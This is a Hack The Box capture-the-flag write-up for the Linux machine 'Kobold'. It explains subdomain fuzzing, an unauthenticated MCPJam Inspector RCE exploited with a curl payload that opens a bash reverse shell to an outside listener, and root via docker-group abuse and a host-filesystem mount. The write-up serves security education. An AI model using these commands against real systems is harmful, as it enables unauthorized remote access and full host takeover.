Write-up

🐉Kobold

ReconSubdomainffuf

🧙 HTB Kobold — Solution Notes

Platform: Hack The Box Machine: Kobold OS: Linux Difficulty: Easy Date: March 27, 2026

🗺️ Attack Chain

Nmap → ffuf (subdomain) → MCP Inspector RCE → Shell (ben) → newgrp docker → Docker Escape → ROOT

🧠 How Does a Hacker Think? — Before You Begin

When starting a machine, the first question in your mind should be: "How wide is this system's exposed attack surface?"

1️⃣ Reconnaissance

Port Scanning

bash

nmap -sV -sC -p- --min-rate 5000 --open -oN kobold_nmap.txt 10.129.243.143

Findings:

The TLS certificate shows *.kobold.htb wildcard → multiple subdomains exist. The Golang HTTP server on port 3552 is also interesting — it will come in handy later.

/etc/hosts Setup

💡 What is /etc/hosts? Why Do We Configure It?

bash

echo "10.129.243.143 kobold.htb mcp.kobold.htb bin.kobold.htb" | sudo tee -a /etc/hosts

🧠 How Does a Hacker Think? — Why Does Subdomain Scanning Matter?

Nmap only shows ports — it doesn't reveal subdomains. But a single server can run dozens of different applications on the same IP. Some of these may be "internal use only," less protected, or left there by a developer for testing.

Subdomain Discovery

💡 What is ffuf and Fuzzing?

bash

ffuf -u "https://kobold.htb/" -k \ -H "Host: FUZZ.kobold.htb" \ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt \ -mc all -c -fs 154

Findings:

🧠 How Does a Hacker Think? — What to Do When You Find a New Service?

We found two new services: MCPJam Inspector and PrivateBin. For both, immediately ask:

2️⃣ Initial Access — MCP Inspector RCE

Vulnerability: CVE-2026-23744 / GHSA-232v-j27c-5pp6

The /api/mcp/connect endpoint of MCPJam Inspector on mcp.kobold.htb passes the serverConfig.command field directly to child_process.spawn() with no authentication or sanitization → Unauthenticated RCE

Listener

💡 Listener and Reverse Shell Logic

bash

nc -lvnp 4444

Exploit

💡 How Does This Exploit Work?

bash

curl -sk -X POST https://mcp.kobold.htb/api/mcp/connect \ -H "Content-Type: application/json" \ -d '{ "serverId": "test", "serverConfig": { "command": "bash", "args": ["-c", "bash -i >& /dev/tcp/10.10.14.13/4444 0>&1"] } }'

Shell Stabilization

💡 Why Do We Stabilize the Shell?

bash

python3 -c 'import pty; pty.spawn("/bin/bash")' export TERM=xterm # Ctrl+Z stty raw -echo; fg

🚩 User Flag

bash

cat ~/user.txt

User: benGroups: uid=1001(ben) gid=1001(ben) groups=1001(ben),37(operator)

🧠 How Does a Hacker Think? — Deciding on a Privilege Escalation Path

We're in as ben. Now we need to do systematic enumeration to reach root. But on this machine, the classic paths (sudo, SUID, crontab) didn't lead anywhere.

3️⃣ Privilege Escalation — Docker Group Abuse

💡 What is Privilege Escalation?

Discovery

The arcane.service file showed that Arcane runs as root:

bash

cat /etc/systemd/system/arcane.service # User=root # WorkingDirectory=/root # ExecStart=/root/arcane_linux_amd64

ps aux confirmed the Docker daemon was running.

gshadow/group Inconsistency

💡 What Does This Inconsistency Mean? Why Does It Matter?

bash

newgrp docker

bash

id # uid=1001(ben) gid=111(docker) groups=111(docker),37(operator),1001(ben)

gid=111(docker) — previously it was gid=1001(ben). Docker group switch successful!

Docker Container Escape → Root

💡 What Does This Command Do?

Alpine couldn't be pulled from the internet, so we used an existing image:

bash

docker images # mysql latest f66b7a288113 # privatebin/nginx-fpm-alpine 2.0.2 f5f5564e6731

Host filesystem mounted into the container:

bash

docker run -v /:/mnt --rm -it mysql chroot /mnt sh

bash

id # uid=0(root) gid=0(root) groups=0(root)

🚩 Root Flag

bash

cat /root/root.txt

📚 Concepts Learned

Virtual Host Enumeration: Finding subdomains with ffuf
MCP Security: Developer tools should never be exposed to the internet
Reverse Shell: The concept of the server connecting back to us
Docker Priv Esc: Docker group = root equivalent
gshadow/group Inconsistency: Activating dormant group membership with newgrp
Container Escape: Achieving host root access via v /:/mnt + chroot

🔑 General Hacker Mindset Summary

When you see a TLS wildcard, run ffuf: .domain.htb means there are hidden subdomains.
Developer tools exposed to the internet are a gold mine: Tools like MCPJam can offer unauthenticated RCE.
Every group in the id output matters: Always check what files and access that group provides.
If Docker is running and you can join the group, you get root: v /:/mnt + chroot is the classic method.

You might also want to look at these

Facts

Camelon CMS · S3 EnumerationApr 2026

WingData

Wingftp · SHA256+Salt · TarfileMar 2026

CCTV

Sqlmap · Hashcat · tcpdumpMar 2026

Snapped

Vhost Fuzzing · PivotingMar 2026